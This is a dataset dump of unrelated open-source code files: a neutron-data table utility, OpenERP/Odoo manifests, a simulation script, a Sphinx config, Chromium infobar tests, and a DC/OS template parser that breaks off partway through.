| repo_name (stringlengths 5-100) | ref (stringlengths 12-67) | path (stringlengths 4-244) | copies (stringlengths 1-8) | content (stringlengths 0-1.05M, ⌀ = nullable) |
|---|---|---|---|---|
neutrons/FastGR
|
refs/heads/master
|
addie/processing/mantid/master_table/utilities.py
|
1
|
from __future__ import (absolute_import, division, print_function)
from xml.dom import minidom
import numpy as np
class Utilities:
""" Utilities related to work in master table """
def __init__(self, parent=None):
self.parent = parent
self.table_ui = parent.processing_ui.h3_table
def get_row_index_from_row_key(self, row_key=None):
""" This methods returns the row for the given row key """
if row_key is None:
return -1
master_table_row_ui = self.parent.master_table_list_ui
nbr_row = self.table_ui.rowCount()
checkbox_ui_of_row_key = master_table_row_ui[row_key]['active']
for _row in np.arange(nbr_row):
_ui_checkbox = self.table_ui.cellWidget(_row, 0).children()[1]
if _ui_checkbox == checkbox_ui_of_row_key:
return _row
return -1
def get_row_key_from_row_index(self, row=-1):
""" This method returns the key (random key) of the given row in master table.
An example of its use is if we want to retrieve the placzek settings for this row
as they are saved in the master_table_row_ui using random key as the key
"""
if row == -1:
return None
master_table_row_ui = self.parent.master_table_list_ui
for _key in master_table_row_ui.keys():
_activate_ui = master_table_row_ui[_key]["active"]
_activate_ui_of_given_row = self.table_ui.cellWidget(row, 0).children()[1]
if _activate_ui == _activate_ui_of_given_row:
return _key
class LoadGroupingFile:
""" This class reads the XML file and will return the
number of groups <group ID=""> found in that file
"""
def __init__(self, filename=''):
self.filename = filename
def get_number_of_groups(self):
try:
xmldoc = minidom.parse(self.filename)
itemlist = xmldoc.getElementsByTagName('group')
return len(itemlist)
except Exception:
return 'N/A'
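# A minimal usage sketch (the grouping file path below is hypothetical):
#   loader = LoadGroupingFile(filename='/tmp/grouping.xml')
#   n_groups = loader.get_number_of_groups()  # int, or 'N/A' if parsing fails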
|
StefanRijnhart/OpenUpgrade
|
refs/heads/master
|
addons/web_kanban_gauge/__openerp__.py
|
428
|
{
'name': 'Gauge Widget for Kanban',
'category': 'Hidden',
'description': """
This widget allows displaying gauges using the justgage library.
""",
'version': '1.0',
'depends': ['web_kanban'],
'data' : [
'views/web_kanban_gauge.xml',
],
'qweb': [
],
'auto_install': True,
}
|
yuanagain/seniorthesis
|
refs/heads/master
|
src/experiment_intervalsim.py
|
1
|
"""
experiment_intervalsim.py
Interval simulation, as in first part of Zgliczynski paper
Author: Yuan Wang
"""
from thesis_utils import *
from thesis_defaults import *
from thesis_poincare_utils import *
from thesis_plot_utils import *
import scipy.integrate as integrate
import scipy.special as special
from scipy.integrate import quad
from scipy.optimize import newton
import time
from evolutioninterval import *
from experiment import *
class ExperimentIntervalSim(Experiment):
# def __init__(self, evo, title = "TITLE", descr = ""):
# self.title = title
# self.descr = descr
# self.evo = evo
# self.setup()
# self.fig_ct = 0
def setParams(self, step_ct = 1, start_pt = default_start):
self.params['step_ct'] = step_ct
self.params['start_pt'] = start_pt
self.saveParams()
def run(self):
"""
Runs the Experiment
"""
data = self.evo.generate( self.params['start_pt'],
h = None,
p_e = 2,
stepCt = self.params['step_ct'] )
self.print(data)
def main():
"""
Testing
"""
print("============")
evo = Evolution_Valdez(lmbda = lmbda_set_1)
print(evo)
print("============")
print("============")
expmt = ExperimentIntervalSim(evo = evo,
title = "Zgliczynski Rigorous Interval Simulation",
descr = "Rigorous Interval Simulation w/ Lohner type algo per Zgliczynski paper")
expmt.setParams(step_ct = 10000, start_pt = toArray(tupleToIntervalVector(default_start)) )
# print("============")
print("Timing")
start = time.time()
expmt.run()
end = time.time()
print("Time:")
print(end - start)
if __name__=="__main__":
main()
|
ssteo/scrapy
|
refs/heads/master
|
scrapy/core/__init__.py
|
216
|
"""
Scrapy core library classes and functions.
"""
|
Vulcanior/GSB_Symfony
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/conf.py
|
2448
|
# -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
|
jmartinezchaine/OpenERP
|
refs/heads/master
|
openerp/addons/crm_profiling/__openerp__.py
|
9
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Customer Profiling',
'version': '1.3',
'category': 'Marketing',
'complexity': "easy",
'description': """
This module allows users to perform segmentation within partners.
=================================================================
It uses the profiling criteria from the earlier segmentation module and improves them, thanks to the new concept of questionnaires: you can now group questions into a questionnaire and use it directly on a partner.
It has also been merged with the earlier CRM & SRM segmentation tool because they were overlapping.
* Note: this module is not compatible with the segmentation module, since it is the same module renamed.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base', 'crm'],
'init_xml': [],
'update_xml': ['security/ir.model.access.csv', 'wizard/open_questionnaire_view.xml', 'crm_profiling_view.xml'],
'demo_xml': ['crm_profiling_demo.xml'],
'test': [
#'test/process/profiling.yml', # TODO: not debugged yet; problem writing data for open.questionnaire from the partner section.
],
'installable': True,
'auto_install': False,
'certificate': '0033984979005',
'images': ['images/profiling_questionnaires.jpeg','images/profiling_questions.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
espadrine/opera
|
refs/heads/master
|
chromium/src/chrome/test/functional/infobars.py
|
60
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import re
import pyauto_functional # Must be imported before pyauto
import pyauto
import test_utils
class InfobarTest(pyauto.PyUITest):
"""TestCase for Infobars."""
def Debug(self):
"""Test method for experimentation.
This method will not run automatically.
To run:
python chrome/test/functional/infobars.py infobars.InfobarTest.Debug
"""
while True:
raw_input('Hit <enter> to dump info.. ')
info = self.GetBrowserInfo()
for window in info['windows']:
for tab in window['tabs']:
print 'Window', window['index'], 'tab', tab['index']
self.pprint(tab['infobars'])
def setUp(self):
pyauto.PyUITest.setUp(self)
self._flash_plugin_type = 'Plug-in'
if self.GetBrowserInfo()['properties']['branding'] == 'Google Chrome':
self._flash_plugin_type = 'Pepper Plugin'
# Forcibly trigger all plugins to get registered. crbug.com/94123
# Sometimes a flash file loaded too quickly after the browser starts
# ends up getting downloaded instead, which seems to indicate that the
# plugin hasn't been registered yet.
self.GetPluginsInfo()
def _GetTabInfo(self, windex=0, tab_index=0):
"""Helper to return info for the given tab in the given window.
Defaults to first tab in first window.
"""
return self.GetBrowserInfo()['windows'][windex]['tabs'][tab_index]
def testPluginCrashInfobar(self):
"""Verify the "plugin crashed" infobar."""
flash_url = self.GetFileURLForContentDataPath('plugin', 'flash.swf')
# Trigger flash plugin
self.NavigateToURL(flash_url)
child_processes = self.GetBrowserInfo()['child_processes']
flash = [x for x in child_processes if
x['type'] == self._flash_plugin_type and
x['name'] == 'Shockwave Flash'][0]
self.assertTrue(flash)
logging.info('Killing flash plugin. pid %d' % flash['pid'])
self.Kill(flash['pid'])
self.assertTrue(self.WaitForInfobarCount(1))
crash_infobar = self._GetTabInfo()['infobars']
self.assertTrue(crash_infobar)
self.assertEqual(1, len(crash_infobar))
self.assertTrue('crashed' in crash_infobar[0]['text'])
self.assertEqual('confirm_infobar', crash_infobar[0]['type'])
# Dismiss the infobar
self.PerformActionOnInfobar('dismiss', infobar_index=0)
self.assertFalse(self._GetTabInfo()['infobars'])
def _VerifyGeolocationInfobar(self, windex, tab_index):
"""Verify geolocation infobar properties.
Assumes that geolocation infobar is showing up in the given tab in the
given window.
"""
# TODO(dyu): Remove this helper function when a function to identify
# infobar_type and index of the type is implemented.
tab_info = self._GetTabInfo(windex, tab_index)
geolocation_infobar = tab_info['infobars']
self.assertTrue(geolocation_infobar)
self.assertEqual(1, len(geolocation_infobar))
self.assertEqual('Learn more', geolocation_infobar[0]['link_text'])
self.assertEqual(2, len(geolocation_infobar[0]['buttons']))
self.assertEqual('Allow', geolocation_infobar[0]['buttons'][0])
self.assertEqual('Deny', geolocation_infobar[0]['buttons'][1])
def testGeolocationInfobar(self):
"""Verify geoLocation infobar."""
url = self.GetHttpURLForDataPath('geolocation', 'geolocation_on_load.html')
self.NavigateToURL(url)
self.assertTrue(self.WaitForInfobarCount(1))
self._VerifyGeolocationInfobar(windex=0, tab_index=0)
# Accept, and verify that the infobar went away
self.PerformActionOnInfobar('accept', infobar_index=0)
self.assertFalse(self._GetTabInfo()['infobars'])
def testGeolocationInfobarInMultipleTabsAndWindows(self):
"""Verify GeoLocation inforbar in multiple tabs."""
url = self.GetFileURLForDataPath( # triggers geolocation
'geolocation', 'geolocation_on_load.html')
for tab_index in range(1, 2):
self.AppendTab(pyauto.GURL(url))
self.assertTrue(
self.WaitForInfobarCount(1, windex=0, tab_index=tab_index))
self._VerifyGeolocationInfobar(windex=0, tab_index=tab_index)
# Try in a new window
self.OpenNewBrowserWindow(True)
self.NavigateToURL(url, 1, 0)
self.assertTrue(self.WaitForInfobarCount(1, windex=1, tab_index=0))
self._VerifyGeolocationInfobar(windex=1, tab_index=0)
# Incognito window
self.RunCommand(pyauto.IDC_NEW_INCOGNITO_WINDOW)
self.NavigateToURL(url, 2, 0)
self.assertTrue(self.WaitForInfobarCount(1, windex=2, tab_index=0))
self._VerifyGeolocationInfobar(windex=2, tab_index=0)
def _GetFlashCrashInfobarCount(self, windex=0, tab_index=0):
"""Returns the count of 'Shockwave Flash has crashed' infobars."""
browser_window = self.GetBrowserInfo()['windows'][windex]
infobars = browser_window['tabs'][tab_index]['infobars']
flash_crash_infobar_count = 0
for infobar in infobars:
if (('text' in infobar) and
infobar['text'].startswith('Shockwave Flash has crashed')):
flash_crash_infobar_count += 1
return flash_crash_infobar_count
def testPluginCrashForMultiTabs(self):
"""Verify plugin crash infobar shows up only on the tabs using plugin."""
non_flash_url = self.GetFileURLForDataPath('english_page.html')
flash_url = self.GetFileURLForContentDataPath('plugin', 'FlashSpin.swf')
# False = non-flash URL, True = flash URL.
# We use this list of values to compare flash and non-flash pages.
urls_type = [False, True, False, True, False]
for _ in range(2):
self.AppendTab(pyauto.GURL(flash_url))
self.AppendTab(pyauto.GURL(non_flash_url))
# Killing flash process
child_processes = self.GetBrowserInfo()['child_processes']
flash = [x for x in child_processes if
x['type'] == self._flash_plugin_type and
x['name'] == 'Shockwave Flash'][0]
self.assertTrue(flash)
self.Kill(flash['pid'])
# The plugin crash infobar should show up in the second tab of this window,
# so pass the window and tab arguments when waiting for the infobar.
self.assertTrue(self.WaitForInfobarCount(1, windex=0, tab_index=1))
for i in range(len(urls_type)):
# Verify that a page without the flash plugin
# does not show the crash infobar.
self.ActivateTab(i)
if not urls_type[i]:
self.assertEqual(
self._GetFlashCrashInfobarCount(0, i), 0,
msg='Did not expect crash infobar in tab at index %d' % i)
elif urls_type[i]:
self.assertEqual(
self._GetFlashCrashInfobarCount(0, i), 1,
msg='Expected crash infobar in tab at index %d' % i)
infobar = self.GetBrowserInfo()['windows'][0]['tabs'][i]['infobars']
self.assertEqual(infobar[0]['type'], 'confirm_infobar')
self.assertEqual(len(infobar), 1)
class OneClickInfobarTest(pyauto.PyUITest):
"""Tests for one-click sign in infobar."""
BLOCK_COOKIE_PATTERN = {'https://accounts.google.com/': {'cookies': 2}}
OC_INFOBAR_TYPE = 'oneclicklogin_infobar'
PW_INFOBAR_TYPE = 'password_infobar'
URL = 'https://www.google.com/accounts/ServiceLogin'
URL_LOGIN = 'https://www.google.com/accounts/Login'
URL_LOGOUT = 'https://www.google.com/accounts/Logout'
def setUp(self):
pyauto.PyUITest.setUp(self)
self._driver = self.NewWebDriver()
def _LogIntoGoogleAccount(self, tab_index=0, windex=0):
"""Log into Google account.
Args:
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
creds = self.GetPrivateInfo()['test_google_account']
username = creds['username']
password = creds['password']
test_utils.GoogleAccountsLogin(self, username, password, tab_index, windex)
# TODO(dyu): Use WaitUntilNavigationCompletes after investigating
# crbug.com/124877
self.WaitUntil(
lambda: self.GetDOMValue('document.readyState'),
expect_retval='complete')
def _PerformActionOnInfobar(self, action):
"""Perform an action on the infobar: accept, cancel, or dismiss.
The one-click sign in infobar must show in the first tab of the first
window. If action is 'accept' then the account is synced. If the action is
'cancel' then the infobar should be dismissed and never shown again. The
account will not be synced. If the action is 'dismiss' then the infobar will
be shown again after the next login.
Args:
action: The action to perform on the infobar.
"""
infobar_index = test_utils.WaitForInfobarTypeAndGetIndex(
self, self.OC_INFOBAR_TYPE)
self.PerformActionOnInfobar(action, infobar_index)
def _DisplayOneClickInfobar(self, tab_index=0, windex=0):
"""One-click sign in infobar appears after logging into google account.
Args:
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
self._LogIntoGoogleAccount(tab_index=tab_index, windex=windex)
self.assertTrue(self.WaitUntil(
lambda: test_utils.GetInfobarIndexByType(
self, self.OC_INFOBAR_TYPE,
tab_index=tab_index, windex=windex) is not None),
msg='The one-click login infobar did not appear.')
def testDisplayOneClickInfobar(self):
"""Verify one-click infobar appears after login into google account.
One-click infobar should appear after signing into a google account
for the first time using a clean profile.
"""
self._DisplayOneClickInfobar()
def testNoOneClickInfobarAfterCancel(self):
"""Verify one-click infobar does not appear again after clicking cancel.
The one-click infobar should not display again after logging into an
account and selecting to reject sync the first time. The test covers
restarting the browser with the same profile and verifying the one-click
infobar does not show after login.
This test also verifies that the password infobar displays.
"""
self._DisplayOneClickInfobar()
self._PerformActionOnInfobar(action='cancel') # Click 'No thanks' button.
self.NavigateToURL(self.URL_LOGOUT)
self._LogIntoGoogleAccount()
test_utils.WaitForInfobarTypeAndGetIndex(self, self.PW_INFOBAR_TYPE)
test_utils.AssertInfobarTypeDoesNotAppear(self, self.OC_INFOBAR_TYPE)
# Restart browser with the same profile.
self.RestartBrowser(clear_profile=False)
self.NavigateToURL(self.URL_LOGOUT)
self._LogIntoGoogleAccount()
test_utils.AssertInfobarTypeDoesNotAppear(self, self.OC_INFOBAR_TYPE)
def testDisplayOneClickInfobarAfterDismiss(self):
"""Verify one-click infobar appears again after clicking dismiss button.
The one-click infobar should display again after logging into an
account and clicking to dismiss the infobar the first time.
This test also verifies that the password infobar does not display.
The one-click infobar should supersede the password infobar.
"""
self._DisplayOneClickInfobar()
self._PerformActionOnInfobar(action='dismiss') # Click 'x' button.
self.NavigateToURL(self.URL_LOGOUT)
self._LogIntoGoogleAccount()
test_utils.WaitForInfobarTypeAndGetIndex(self, self.OC_INFOBAR_TYPE)
test_utils.AssertInfobarTypeDoesNotAppear(self, self.PW_INFOBAR_TYPE)
def _OpenSecondProfile(self):
"""Create a second profile."""
self.OpenNewBrowserWindowWithNewProfile()
self.assertEqual(2, len(self.GetMultiProfileInfo()['profiles']),
msg='The second profile was not created.')
def testDisplayOneClickInfobarPerProfile(self):
"""Verify one-click infobar appears for each profile after sign-in."""
# Default profile.
self._DisplayOneClickInfobar()
self._OpenSecondProfile()
self._DisplayOneClickInfobar(windex=1)
def testNoOneClickInfobarWhenCookiesBlocked(self):
"""Verify one-click infobar does not show when cookies are blocked.
One-click sign in should not be enabled if cookies are blocked for Google
accounts domain.
This test verifies the following bug: crbug.com/117841
"""
# Block cookies for Google accounts domain.
self.SetPrefs(pyauto.kContentSettingsPatternPairs,
self.BLOCK_COOKIE_PATTERN)
self._LogIntoGoogleAccount()
test_utils.AssertInfobarTypeDoesNotAppear(self, self.OC_INFOBAR_TYPE)
def testOneClickInfobarShownWhenWinLoseFocus(self):
"""Verify one-click infobar still shows when window loses focus.
This test verifies the following bug: crbug.com/121739
"""
self._LogIntoGoogleAccount()
test_utils.WaitForInfobarTypeAndGetIndex(self, self.OC_INFOBAR_TYPE)
# Open new window to shift focus away.
self.OpenNewBrowserWindow(True)
test_utils.GetInfobarIndexByType(self, self.OC_INFOBAR_TYPE)
def testNoOneClickInfobarInIncognito(self):
"""Verify that one-click infobar does not show up in incognito mode."""
self.RunCommand(pyauto.IDC_NEW_INCOGNITO_WINDOW)
self._LogIntoGoogleAccount(windex=1)
test_utils.AssertInfobarTypeDoesNotAppear(
self, self.OC_INFOBAR_TYPE, windex=1)
if __name__ == '__main__':
pyauto_functional.Main()
|
mesosphere-mergebot/mergebot-test-dcos
|
refs/heads/master
|
gen/template.py
|
16
|
# Simple python templating system. Works on yaml files which are also jinja-style templates.
# Scans the jinja for the structure, and outputs an AST of the possible option combinations.
# That graph could be fed into something like an argument prompter to get
# out all the arguments.
# Simple state machine parser, hard coded. Recognizes a couple of tokens:
# "template body" - arbitrary bytes
# To escape the template signature, put four `{`, so `{{{{` would result in the final result getting a `{{`.
# For closing ones, just put closing wherever. Excess closing isn't an error, and closing is only
# consumed if opening has been passed.
# Unmatched closing }} outside an open {{ ... }} are treated as plain text.
# "template variable" - {{ <identifier> }}
# "template flow control" - {% <control_expression %}
# The valid control expressions are:
# switch <identifier>
# case <string>:
# endswith
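# A minimal usage sketch (the template string below is hypothetical; parse_str
# and Template.render are defined later in this module):
#   template = parse_str('{% switch os %}{% case "linux" %}apt{% endswitch %} {{ count }}')
#   template.render({'os': 'linux', 'count': 3})  # -> 'apt 3'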
from typing import Optional, Tuple
from pkg_resources import resource_string
import gen.internals
identifier_valid_characters = 'abcdefghijklmnopqrstuvwxyz_0123456789'
class SyntaxError(Exception):
def __init__(self, message, filename=None):
self.message = message
self.filename = filename
def __str__(self):
if self.filename:
return repr(self.message) + " while parsing file {}".format(self.filename)
else:
return repr(self.message)
class Tokenizer:
def __init__(self, corpus: str):
self.__corpus = corpus
self.__to_lex = corpus
self.__token_pos = 0
self.tokens = []
while True:
try:
kind, value = self.__read_token()
except SyntaxError as ex:
# TODO(cmaloney): Calculate line and column information
context = "context: '{}'".format(self.__to_lex[:10])
raise SyntaxError(
"ERROR parsing code near {}. {}".format(context, ex)) from ex
self.tokens.append((kind, value))
if kind == "eof":
break
def peek(self):
if self.__token_pos == len(self.tokens):
raise RuntimeError("Walked past end of token list")
return self.tokens[self.__token_pos]
def advance(self):
if self.__token_pos >= len(self.tokens):
raise RuntimeError("Walked past end of token list")
self.__token_pos += 1
return self.tokens[self.__token_pos]
def __read_token(self):
# __to_lex is set to none after the EOF token is emitted.
assert self.__to_lex is not None
if len(self.__to_lex) == 0:
self.__to_lex = None
return "eof", None
# If not starting with '{', consume text until we find '{' as a blob
# token.
if self.__to_lex[0] != '{':
split = self.__to_lex.split('{', 1)
assert(len(split) == 1 or len(split) == 2)
if len(split) == 2:
self.__to_lex = '{' + split[1]
else:
# No remaining '{' in text. This is the end of the string.
self.__to_lex = ''
return 'blob', split[0]
# Process '{' beginning control sequences.
# Define some helper functions used by multiple methods below.
def read_whitespace():
if self.__to_lex[0] != ' ':
raise SyntaxError("Expected exactly one space")
if self.__to_lex[1].isspace():
raise SyntaxError(
"Found more spaces than expected. Only one space is allowed by coding convention.")
self.__to_lex = self.__to_lex[1:]
def read_identifier():
# Before identifiers is always whitespace / we're in control where
# whitespace is arbitrary.
read_whitespace()
identifier = ""
while self.__to_lex[0] in identifier_valid_characters:
identifier += self.__to_lex[0]
self.__to_lex = self.__to_lex[1:]
return identifier
def read_str():
read_whitespace()
if not self.__to_lex.startswith('"'):
raise SyntaxError(
"Expected string starting with '\"' as value for case but didn't find it.")
self.__to_lex = self.__to_lex[1:]
value = ""
has_backslash = False
while True:
if len(self.__to_lex) == 0:
raise SyntaxError(
"Unexpected end of file when reading contents of string")
cur = self.__to_lex[0]
self.__to_lex = self.__to_lex[1:]
if cur in ['\n', '\r']:
raise SyntaxError("Newlines aren't allowed in strings")
if has_backslash:
if cur in ['"', '\\']:
value += cur
else:
raise SyntaxError("Invalid escape sequence \\{} in quote".format(cur))
has_backslash = False
continue
if cur == '\\':
has_backslash = True
elif cur == '"':
return value
else:
value += cur
def read_end_control_group():
# Arbitrary whitespace is allowed before end of the control group
read_whitespace()
if not self.__to_lex.startswith('%}'):
raise SyntaxError(
"Expected end of control group '%}' after control statement but didn't find it.")
self.__to_lex = self.__to_lex[2:]
# Note: We want the longest match to win. Since we are doing prefix
# matching that means we must test the longest strings which have
# prefixes which are also valid tokens first.
if self.__to_lex.startswith('{{{{'):
self.__to_lex = self.__to_lex[4:]
return "blob", "{{"
if self.__to_lex.startswith('{{{'):
raise SyntaxError(
"{{{ is illegal. To make an argument substitution use " +
"{{ <identifier> }}. To make '{{' use '{{{{'. To make '{{{' " +
"use '{{{{{' (the first for become two, then the last is left" +
" alone since it is all alone)")
elif self.__to_lex.startswith('{%'):
# TODO(cmaloney): There is fairly specific parsing happening in control and ident rather
# than doing what they probably _should_ be doing for generic parsing. There is some
# duplicated code. That should be removed / refactored at some point.
# switch <identifier>
# case <string>
# endswitch
self.__to_lex = self.__to_lex[2:]
# Clean leading whitespace
read_whitespace()
if self.__to_lex.startswith("switch"):
self.__to_lex = self.__to_lex[6:]
identifier = read_identifier()
read_end_control_group()
return "switch", identifier
elif self.__to_lex.startswith("case"):
self.__to_lex = self.__to_lex[4:]
value = read_str()
read_end_control_group()
return "case", value
elif self.__to_lex.startswith("endswitch"):
self.__to_lex = self.__to_lex[9:]
read_end_control_group()
return "endswitch", None
elif self.__to_lex.startswith("for"):
self.__to_lex = self.__to_lex[3:]
new_var = read_identifier()
read_whitespace()
if not self.__to_lex.startswith("in"):
raise SyntaxError("Expected {% for foo in bar %}, didn't find the ' in'.")
self.__to_lex = self.__to_lex[2:]
iterable = read_identifier()
read_end_control_group()
return "for", (new_var, iterable)
elif self.__to_lex.startswith("endfor"):
self.__to_lex = self.__to_lex[6:]
read_end_control_group()
return "endfor", None
else:
raise SyntaxError(
"Unknown control group directive. Expected switch, case, or endswitch.")
elif self.__to_lex.startswith("{{"):
# whitespace ident whitespace close_curly
# Clean off leading whitespace
self.__to_lex = self.__to_lex[2:]
try:
identifier = read_identifier()
except SyntaxError as ex:
raise SyntaxError(
"{} while parsing argument substitution block {{{{ <identifier> }}}}.".format(ex)) from ex
if len(identifier) == 0:
raise SyntaxError("Identifier must be a non-empty string")
# trailing whitespace after identifier
read_whitespace()
# Optionally a filter expression
filter_id = None
if self.__to_lex.startswith('|'):
self.__to_lex = self.__to_lex[1:]
filter_id = read_identifier()
read_whitespace()
# Close curly braces
if not self.__to_lex.startswith('}}'):
raise SyntaxError(
"Expected '}}' after '{{ <identifier>' but didn't find it.")
self.__to_lex = self.__to_lex[2:]
return "replacement", (identifier, filter_id)
else:
# Was just a single open curly, we're a single curly blob
self.__to_lex = self.__to_lex[1:]
return "blob", "{"
# Language:
# template -> chunks EOF
# chunks -> chunk*
# abstract chunk
# blob: chunk -> blob # This is represented as just a str
# replacement: chunk -> replacement
# switch: chunk -> startswitch cases endswitch
# cases -> case* # This is represented as just a dictionary
# case -> case_tok chunks
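# For example (a sketch based on the grammar above), parse_str('x {{ y }}').ast
# is ['x ', Replacement(('y', None))], and a switch parses into a Switch node
# whose cases dict maps each case string to its sub-AST.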
class Switch:
def __init__(self, identifier: str, cases: dict):
self.identifier = identifier
self.cases = cases
def __repr__(self):
return "<switch {} {}>".format(self.identifier, self.cases)
def __eq__(self, other):
return isinstance(other, Switch) and self.identifier == other.identifier and self.cases == other.cases
class For:
def __init__(self, new_var: str, iterable: str, body: list):
self.new_var = new_var
self.iterable = iterable
self.body = body
def __repr__(self):
return "<for {} in {}>".format(self.new_var, self.iterable)
def __eq__(self, other):
return isinstance(other, For) and self.new_var == other.new_var and self.iterable == other.iterable
class Replacement:
def __init__(self, identifier_and_filter: Tuple[str, Optional[str]]):
self.identifier = identifier_and_filter[0]
self.filter = identifier_and_filter[1]
def __repr__(self):
return "<replacement {}{}>".format(
self.identifier,
(" filter " + self.filter) if self.filter is not None else "")
def __eq__(self, other):
return isinstance(other, Replacement) and self.identifier == other.identifier
class UnsetParameter(KeyError):
def __init__(self, message, identifier):
super(KeyError, self).__init__(message)
self.identifier = identifier
class UnsetMarker:
pass
class Template:
def __init__(self, ast: list):
self.ast = ast
def render(self, arguments: dict, filters: dict={}):
def get_argument(name):
try:
return arguments[name]
except KeyError as ex:
raise UnsetParameter("Unset parameter {}".format(name), name) from ex
def render_ast(ast):
rendered = ""
for chunk in ast:
if isinstance(chunk, Switch):
choice = get_argument(chunk.identifier)
if choice not in chunk.cases:
raise ValueError("switch %s: value `%s` is not in the set of handled cases" % (
chunk.identifier, choice))
rendered += render_ast(chunk.cases[choice])
elif isinstance(chunk, Replacement):
value = get_argument(chunk.identifier)
if chunk.filter is None:
rendered += str(value)
else:
try:
filter_func = filters[chunk.filter]
except KeyError:
raise UnsetParameter("Unset filter parameter {}".format(chunk.filter), chunk.filter)
rendered += str(filter_func(value))
elif isinstance(chunk, For):
# If the argument is a string, it should be a json list.
iterable = get_argument(chunk.iterable)
# TODO(cmaloney): for should only be used (for now) in code which doesn't contain
# arbitrary user parameters.
# Stash the original state of the argument.
original_value = UnsetMarker()
